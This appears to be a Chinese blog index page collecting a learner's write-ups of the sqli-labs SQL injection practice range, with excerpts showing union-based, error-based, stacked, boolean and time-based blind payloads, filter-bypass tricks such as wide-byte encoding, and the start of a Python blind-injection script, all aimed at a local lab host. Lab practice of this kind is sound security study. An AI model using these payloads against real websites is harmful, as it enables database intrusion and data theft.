sqli-labs
好好学习不好吗?
这个作者很懒,什么都没留下…
展开
-
sqli-labs 靶场知识总结
sqli-labs 靶场知识总结由于我的电脑最近用新系统的时候,还不适应,所以有些通过笔记不见了,/(ㄒoㄒ)/~~我直接写总结吧(有些从注入天书摘抄的,(__) 嘻嘻……)基于从服务器接收到的响应▲基于错误的 SQL 注入▲联合查询的类型▲堆查询注射▲SQL 盲注•基于布尔 SQL 盲注•基于时间的 SQL 盲注•基于报错的 SQL 盲注基于如何处理输入的 SQL 查询(数...原创 2019-11-01 19:15:38 · 1060 阅读 · 0 评论 -
sqli-labs less 54-55
#sqli-labs less54.这一关只能进行十次尝试http://192.168.56.101/sqli-labs-master/Less-54/?id=-1’ union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=‘challeges’)–+...原创 2019-11-01 12:18:37 · 204 阅读 · 0 评论 -
sqli-labs less50-53
#sqli-labs less 50-53是order by 和stacked injection 的结合这里以less50为主http://192.168.56.101/sqli-labs-master/Less-50/?sort=1;create table less50 like users原创 2019-11-01 10:42:07 · 713 阅读 · 0 评论 -
#sqli-labs less46
#sqli-labs less46?sort=1 and (select count() from information_schema.tables group by concat((select concat(table_name)from information_schema.tables where table_schema='security'limit 0,1),floor(rand...原创 2019-10-31 22:46:49 · 672 阅读 · 0 评论 -
sqli-labs less32
#sqli-labs less 32这关主要是采用宽字节注入Less-32,33,34,35,36,37 六关全部是针对’和\的过滤,所以我们放在一起来进行讨论。对宽字节注入的同学应该对这几关的 bypass 方式应该比较了解。我们在此介绍一下宽字节注入的原理和基本用法。原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii ...原创 2019-10-30 22:55:59 · 331 阅读 · 3 评论 -
HPP注入引入
sqli-labs less 26~28由于windows中的apache解析的问题,我就不具体阐述了(主要是懒)这次我们主要来学习一下HPP注入攻击这是学习HPP的好网站原创 2019-10-30 20:54:04 · 197 阅读 · 0 评论 -
这是对付sqli-labs less5 的盲注python脚本(不懂,写了好久)
import requestsdb_length=1db_url=''db_place=1db_name=''db_ascii=1print("猜解数据库长度")url="http://192.168.56.101/sqli-labs-master/less-5/?id=1'"for db_length in range(1,100): db_url=url+'and %d...原创 2019-10-29 15:23:59 · 772 阅读 · 1 评论 -
sqli-labs less25a
#sqli-labs less25a基于Bool_GET过滤AND/OR数字型_盲注*0x01. 注入方式与回显对比(Review)GETLess 注入方法 正确回显 错误回显1 基于错误注入 查询到的用户名和密码 Mysql错误信息5 双注入 固定字符串 Mysql错误信息7 导出文件注入 固定字符串 另一固定字符...原创 2019-10-26 15:32:51 · 228 阅读 · 0 评论 -
sqli-labs less 25
#sqli-labs less25有过滤的时候首先要判断这个过滤是一次性的还是非一次性的:若是一次性的,且只是将过滤字符换成了空字符:双写——or=oorr、and=anandd若是非一次性的,就要考虑一些变形:大小写变形——or=Or=oR=OR利用运算符——or=||、and=&&URL编码——#=%23,Hex编码——~=0x7e添加注释——/or/...原创 2019-10-26 15:07:25 · 148 阅读 · 0 评论 -
sqli-labs less24
#sqli-labs less 24函数回顾mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。下列字符受影响:\x00\n\r\’"\x1a如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。语法mysql_real_escape_string(string,connection)参数 ...原创 2019-10-26 11:15:21 · 139 阅读 · 0 评论 -
sqli-labs less23
#sqli-labs less 23这一关的与第一关的区别有两个,一个是注释符# --+被过滤了所以我们得闭合第二个单引号另一个区别是不能用order by 来判断字段数了具体原因请参照 https://www.jianshu.com/p/2602430f8ee4’ union select 1,2,3,4 or ‘1’='1’ union select 1,version(),3 o...原创 2019-10-26 09:47:49 · 222 阅读 · 0 评论 -
sqli-labs less21
#sqli-labs less 19这一关大概与less18差不多,只不过playload得用base64加密') order by 4') union select 1,2,3 #')union select 1,database(),version()#')union select 1,(select group_concat(table_name) from information...原创 2019-10-26 09:14:07 · 288 阅读 · 0 评论 -
sqli-labs less18
sqli-labs less 18reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1)先用这句话简单的判断后台insert 语句insert="INSERTINTOsecurity.uagents(uagent,ipaddress,username)VALUES(′insert="INSERT INTO security.uage...原创 2019-10-24 14:00:13 · 390 阅读 · 0 评论 -
sqli-labs-less17
#sqli-labs-less17在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项成功报错,说明passwd这一项可以进行注入'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...原创 2019-10-23 21:40:54 · 815 阅读 · 0 评论 -
sqli-labs-less-15
#sqli-labs-less-15不管用’ " ') ") 都没显错,所以猜测得用时间盲注所以进行尝试admin’ or if(ascii(substr(database(),1,1))=115,1,sleep(5))–+admin’ or if(ascii(substr(database(),2,1))=15,1,sleep(5))–+admin’ or if(left(...原创 2019-10-18 19:11:29 · 237 阅读 · 0 评论 -
sqli-labs less13
#sqli-labs less13由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。然后我们发现他是’)所以我们继续往下走admin ’ order by n #发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现所以可以判断字段数为2接下来试试adm...原创 2019-10-18 18:19:37 · 351 阅读 · 0 评论 -
#sqli-labs less 11
#sqli-labs less 11终于到post的阶段了首先试一下常见的弱口令username:admin password:admin结果就成功了。。。算了,‘正规套路’去搞吧顺便练练burp在登陆框中写入 admin 111接下来试试admin’111得到>You have an error in your SQL syntax; check the ...原创 2019-10-18 16:52:47 · 169 阅读 · 0 评论 -
sqli-labs less -7
##sqli-labs less -7http://localhost/sqli-labs-master/Less-7/?id=1首先老办法判断是数值型的、还是字符型的用and 1=1 和and 1=2 判断并不是数值型的接下来用’ 以及 " 来判断结果判断’ 回显错误 " 回显正常说明是’ 字符型但是用 ’ --+ 发现说明还缺少一些东西猜测用)发现’))–+ 回显...原创 2019-10-18 16:47:04 · 394 阅读 · 0 评论 -
sqli-labs-less 5之盲注
#盲注相关函数(得好好学python来写脚本不然。。。。。。。)我们进行手工盲注测试,需要用到substr()、length()、ascii()、left()、count()这些sql数据库函数。ascii(a)将a转换成其ASCII值ord(a)将a转换成其ASCII值left(a,b)从左往右截取字符串a的前b个字符substr(a,b,c)从b位置开始,截取字符串a的c长度mid...原创 2019-10-18 16:28:46 · 348 阅读 · 0 评论 -
sqli-labs less1(步入网安第一关)
#sqli-labs less1————————————————##重要函数和sql语句使用group_concat() 函数可以让查询获得的数据组成一行显示例子:select group_concat(SCHEMA_NAME) from information_schema.SCHEMATAcount()函数用于统计个数(类似于表的个数,数据库的个数等等)例子:select c...原创 2019-10-16 20:31:48 · 511 阅读 · 0 评论 -
#sqli-labs less5
#sqli-labs less5从含义上讲,count(1) 与 count() 都表示对全部数据行的查询。count() 包括了所有的列,相当于行数,在统计结果的时候,不会忽略列值为NULL ;count(1) 用1代表代码行,在统计结果的时候,不会忽略列值为NULL 。一般情况下SQL的报错信息是不会显示在页面中的只有在php.ini 进行如下配置display_errors=On ...原创 2019-10-18 16:20:53 · 230 阅读 · 0 评论